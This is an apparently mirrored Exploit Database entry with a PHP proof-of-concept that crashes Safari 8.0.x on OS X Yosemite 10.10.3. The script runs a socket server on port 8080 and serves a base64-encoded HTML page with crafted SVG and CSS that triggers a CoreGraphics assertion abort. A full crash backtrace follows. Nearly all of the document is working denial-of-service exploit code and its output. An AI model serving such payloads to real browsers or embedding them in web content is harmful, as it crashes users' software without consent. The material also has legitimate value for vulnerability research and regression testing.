Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x – Crash (PoC)

• Exploit Database
• 114 阅读

• 作者： Mohammad Reza Espargham
  日期： 2015-06-26
• 类别：

  • dos
  平台：

  • osx
• 来源：https://www.exploit-db.com/exploits/37386/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205

  #!/usr/bin/php <?php # Title:Safari 8.0.X / OS X Yosemite 10.10.3 Crash Proof Of Concept # Product Website:https://www.apple.com/safari/ # Author :Mohammad Reza Espargham # Linkedin :https://ir.linkedin.com/in/rezasp # E-Mail :me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website:www.reza.es # Twitter:https://twitter.com/rezesp # FaceBook :https://www.facebook.com/mohammadreza.espargham       # Usage : # php poc.php # Open Safari and open ip:8080 / 127.0.0.1:8080 # Crashed ;)   #Main POC Code $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die(&apos;Failed to create socket!&apos;); socket_bind($reza, 0,8080); socket_listen($reza); print "\nNow Open Safari and open ip:8080 / 127.0.0.1:8080\n\n"; $msg = &apos;PGh0bWw+CjxzdHlsZT4Kc3ZnIHsKICAgIHBhZGRpbmctdG9wOiAxMzk0JTsKICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7Cn0KPC9zdHlsZT4KPHN2ZyB2aWV3Qm94PSIxIDIgNTAwIDUwMCIgd2lkdGg9IjkwMCIgaGVpZ2h0PSI5MDAiPgo8cG9seWxpbmUgcG9pbnRzPSIxIDEsMiAyIj48L3BvbHlsaW5lPgo8L3N2Zz4KPC9odG1sPg==&apos;; $msgd=base64_decode($msg); for (;;) { if ($client = @socket_accept($reza)) { socket_write($client, "HTTP/1.1 200 OK\r\n" . "Content-length: " . strlen($msgd) . "\r\n" . "Content-Type: text/html; charset=UTF-8\r\n\r\n" . $msgd); } else usleep(100000); }           #Crash Report /*   Process Model: Multiple Web Processes     Thread 0 Crashed:: Dispatch queue: com.apple.main-thread 0 libsystem_kernel.dylib 0x00007fff8e628286 __pthread_kill + 10 1 libsystem_c.dylib 0x00007fff90619b53 abort + 129 2 libsystem_c.dylib 0x00007fff905e1c39 __assert_rtn + 321 3 com.apple.CoreGraphics 0x00007fff87716e4e CGPathCreateMutableCopyByTransformingPath + 242 4 com.apple.CoreGraphics 0x00007fff8773aff0 CGContextAddPath + 93 5 com.apple.WebCore 0x0000000104ea8c84 WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148 6 com.apple.WebCore 0x000000010597e851 WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) + 65 7 com.apple.WebCore 0x000000010597f08a WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, WebCore::GraphicsContext*) + 122 8 com.apple.WebCore 0x000000010597f3c3 WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131 9 com.apple.WebCore 0x0000000104fa73cb WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 379 10com.apple.WebCore 0x0000000104fa7062 WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 1330 11com.apple.WebCore 0x0000000104f1ee72 WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 722 12com.apple.WebCore 0x0000000105429e88 WebCore::InlineElementBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 312 13com.apple.WebCore 0x0000000104ea4a63 WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251 14com.apple.WebCore 0x0000000104ea4509 WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89 15com.apple.WebCore 0x0000000104e53d96 WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694 16com.apple.WebCore 0x0000000104e51373 WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 67 17com.apple.WebCore 0x0000000104e50724 WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420 18com.apple.WebCore 0x0000000104e529af WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287 19com.apple.WebCore 0x00000001058db139 WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393 20com.apple.WebCore 0x0000000104e51478 WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72 21com.apple.WebCore 0x0000000104e51420 WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240 22com.apple.WebCore 0x0000000104e50724 WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420 23com.apple.WebCore 0x0000000104e529af WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287 24com.apple.WebCore 0x0000000104e512b2 WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) + 370 25com.apple.WebCore 0x0000000104e50f87 WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*, bool, bool) + 423 26com.apple.WebCore 0x0000000104e4fc30 WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2576 27com.apple.WebCore 0x0000000104e4f002 WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010 28com.apple.WebCore 0x0000000104e4fd62 WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2882 29com.apple.WebCore 0x0000000104e7ac36 WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned int, unsigned int) + 358 30com.apple.WebCore 0x000000010593757f WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect const&) + 799 31com.apple.WebCore 0x000000010537dd44 WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, WebCore::FloatRect const&) + 132 32com.apple.WebCore 0x00000001058b6ad9 WebCore::PlatformCALayer::drawLayerContents(CGContext*, WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, WTF::CrashOnOverflow>&) + 361 33com.apple.WebCore 0x0000000105b170a7 WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167 34com.apple.WebCore 0x0000000105ba36cc -[WebSimpleLayer drawInContext:] + 172 35com.apple.QuartzCore 0x00007fff8d7033c7 CABackingStoreUpdate_ + 3306 36com.apple.QuartzCore 0x00007fff8d7026d7 ___ZN2CA5Layer8display_Ev_block_invoke + 59 37com.apple.QuartzCore 0x00007fff8d702694 x_blame_allocations + 81 38com.apple.QuartzCore 0x00007fff8d6f643c CA::Layer::display_() + 1546 39com.apple.WebCore 0x0000000105ba35eb -[WebSimpleLayer display] + 43 40com.apple.QuartzCore 0x00007fff8d6f47fd CA::Layer::display_if_needed(CA::Transaction*) + 603 41com.apple.QuartzCore 0x00007fff8d6f3e81 CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35 42com.apple.QuartzCore 0x00007fff8d6f3612 CA::Context::commit_transaction(CA::Transaction*) + 242 43com.apple.QuartzCore 0x00007fff8d6f33ae CA::Transaction::commit() + 390 44com.apple.QuartzCore 0x00007fff8d701f19 CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, void*) + 71 45com.apple.CoreFoundation 0x00007fff869f7127 __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23 46com.apple.CoreFoundation 0x00007fff869f7080 __CFRunLoopDoObservers + 368 47com.apple.CoreFoundation 0x00007fff869e8bf8 CFRunLoopRunSpecific + 328 48com.apple.HIToolbox 0x00007fff8df1156f RunCurrentEventLoopInMode + 235 49com.apple.HIToolbox 0x00007fff8df112ea ReceiveNextEventCommon + 431 50com.apple.HIToolbox 0x00007fff8df1112b _BlockUntilNextEventMatchingListInModeWithFilter + 71 51com.apple.AppKit 0x00007fff8ebe59bb _DPSNextEvent + 978 52com.apple.AppKit 0x00007fff8ebe4f68 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 346 53com.apple.AppKit 0x00007fff8ebdabf3 -[NSApplication run] + 594 54com.apple.AppKit 0x00007fff8eb57354 NSApplicationMain + 1832 55libxpc.dylib 0x00007fff8ab77958 _xpc_objc_main + 793 56libxpc.dylib 0x00007fff8ab79060 xpc_main + 490 57com.apple.WebKit.WebContent 0x0000000103f10b40 0x103f10000 + 2880 58libdyld.dylib 0x00007fff873e45c9 start + 1 */ ?>